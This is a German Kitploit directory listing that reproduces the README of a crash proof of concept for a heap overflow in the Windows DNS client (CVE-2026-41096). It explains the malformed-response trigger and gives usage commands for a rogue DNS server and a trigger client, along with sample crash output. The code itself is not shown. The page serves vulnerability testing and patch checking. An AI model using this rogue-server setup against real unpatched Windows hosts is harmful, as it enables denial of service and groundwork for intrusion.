Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-41096 — CVE-2026-41096: Heap-Überlauf im Windows-DNS-Client | Kitploit
Tools/GitHubGitHub/m0n1x90/cve-2026-41096
Payload-GenerierungSchwachstellenanalyseExploitationFuzzingDNS-AnalyseBinary-Exploitation
GitHubm0n1x90/cve-2026-41096

CVE-2026-41096

CVE-2026-41096: Heap-Überlauf im Windows-DNS-Client

Repository anzeigen
32vor 2 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2026-41096 - Crash-PoC

Heap-Overflow in DnsRawTruncateMessageForUdp() (dnsapi.dll). Eine manipulierte DNS-Antwort mit QDCOUNT=0 und einem großen OPT-Record verursacht einen 604-Byte-Heap-Overflow, wenn die Truncation-Logik den Zielzeiger falsch berechnet.

MSRC-Hinweis: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-41096

Komponenten

DateiBeschreibung
rogue_dns_server.pyRogue-DNS-Server (Python 3). Antwortet auf jede Anfrage mit einer QDCOUNT=0 + OPT-Antwort (623 Bytes).
trigger_client.cTrigger-Client (C/Win32). Ruft DnsQueryRaw auf, das auf den Rogue-Server zeigt. Fängt den Absturz über SetUnhandledExceptionFilter ab.

Voraussetzungen

Angreifer (Rogue-Server):

  • Python 3
  • Root/Administrator (Port 53)

Opfer (Trigger-Client):

  • Windows-Betriebssystem mit DnsCache-Dienst (benötigt DnsQueryRaw)
  • Verwundbare Version von dnsapi.dll
  • Visual Studio / Windows SDK (zum Erstellen)

Verwendung

1. Rogue-Server starten:

root@kitploit:~
sudo python3 rogue_dns_server.py

2. Trigger-Client erstellen und ausführen:

root@kitploit:~
cl /W4 /O2 trigger_client.c /link ws2_32.lib
trigger_client.exe <ROGUE_DNS_IP>

3. (Optional) Page Heap für einen deterministischen Absturz aktivieren:

root@kitploit:~
gflags /p /enable trigger_client.exe /full
trigger_client.exe <ROGUE_DNS_IP>

Exit-Codes

CodeBedeutung
0System ist gepatcht (DNS_ERROR_BAD_PACKET wurde sauber zurückgegeben)
1Fehler (DnsQueryRaw nicht gefunden, Netzwerkproblem usw.)
2Absturz erkannt (Heap-Overflow bestätigt)

Beispielausgabe

Verwundbar (Page Heap):

root@kitploit:~
[*] Querying rogue server 192.168.56.1:53 via DnsQueryRaw...
[*] Waiting for response...

[!!] CRASH - Exception 0xC0000005 at 0x00007FFD1A2B4F20
[!!] WRITE at 0x000001A33C3B1000

[!!] CVE-2026-41096 CONFIRMED - heap overflow triggered.

Verwundbar (ohne Page Heap):

root@kitploit:~
[*] Querying rogue server 192.168.56.1:53 via DnsQueryRaw...
[*] Waiting for response...

[!!] CRASH - Exception 0xC0000374 at 0x00007FFD1B5DXXXX
[!!] CVE-2026-41096 CONFIRMED - heap overflow triggered.

Gepatcht:

root@kitploit:~
[*] Querying rogue server 192.168.56.1:53 via DnsQueryRaw...
[*] Waiting for response...
[+] Callback: queryStatus=0x251E
[+] DNS_ERROR_BAD_PACKET - system is PATCHED.
Tool herunterladen